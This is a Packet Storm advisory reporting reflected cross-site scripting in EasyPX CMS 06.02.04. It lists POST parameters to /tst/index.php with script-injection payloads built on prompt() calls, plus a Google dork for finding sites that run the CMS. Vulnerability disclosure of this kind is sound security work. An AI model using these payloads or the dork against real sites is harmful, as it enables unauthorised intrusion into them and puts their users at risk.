Lucene search

K
packetstormIndoushkaPACKETSTORM:174138
HistoryAug 14, 2023 - 12:00 a.m.

EasyPX CMS 06.02.04 Cross Site Scripting

2023-08-1400:00:00
indoushka
packetstormsecurity.com
143
easypx cms[v06.02.04 xss]{vulnerability}[post inputs][google dork][mozilla firefox][windows 10][french][domphp][freeware][cross site scripting][security vulnerability]
`====================================================================================================================================  
| # Title : EasyPX CMS V06.02.04 XSS Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |  
| # Vendor : http://www.domphp.com/ |  
| # Dork : Site fonctionnant sous Easy PX 41 CMOS 06.02.04 © 2004 - 2006 Freeware |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] This vulnerability affects : /tst/index.php  
  
URL encoded POST input choixgalerie was set to 1" onmouseover=prompt(951655) bad="  
The input is reflected inside a tag parameter between double quotes.  
URL encoded POST input pg was set to system/fnc/readpg.php'"()&%<ScRiPt >prompt(940614)</ScRiPt>  
URL encoded POST input pg was set to modules/login/inscription.php'"()&%<ScRiPt >prompt(904457)</ScRiPt>  
URL encoded POST input pg_id was set to http://www.generation-libre.com/index2.php%3foption%3dcom_rss'"()&%<ScRiPt >prompt(920742)</ScRiPt>  
URL encoded POST input pg_title was set to RSS'"()&%<ScRiPt >prompt(963497)</ScRiPt>  
  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================  
`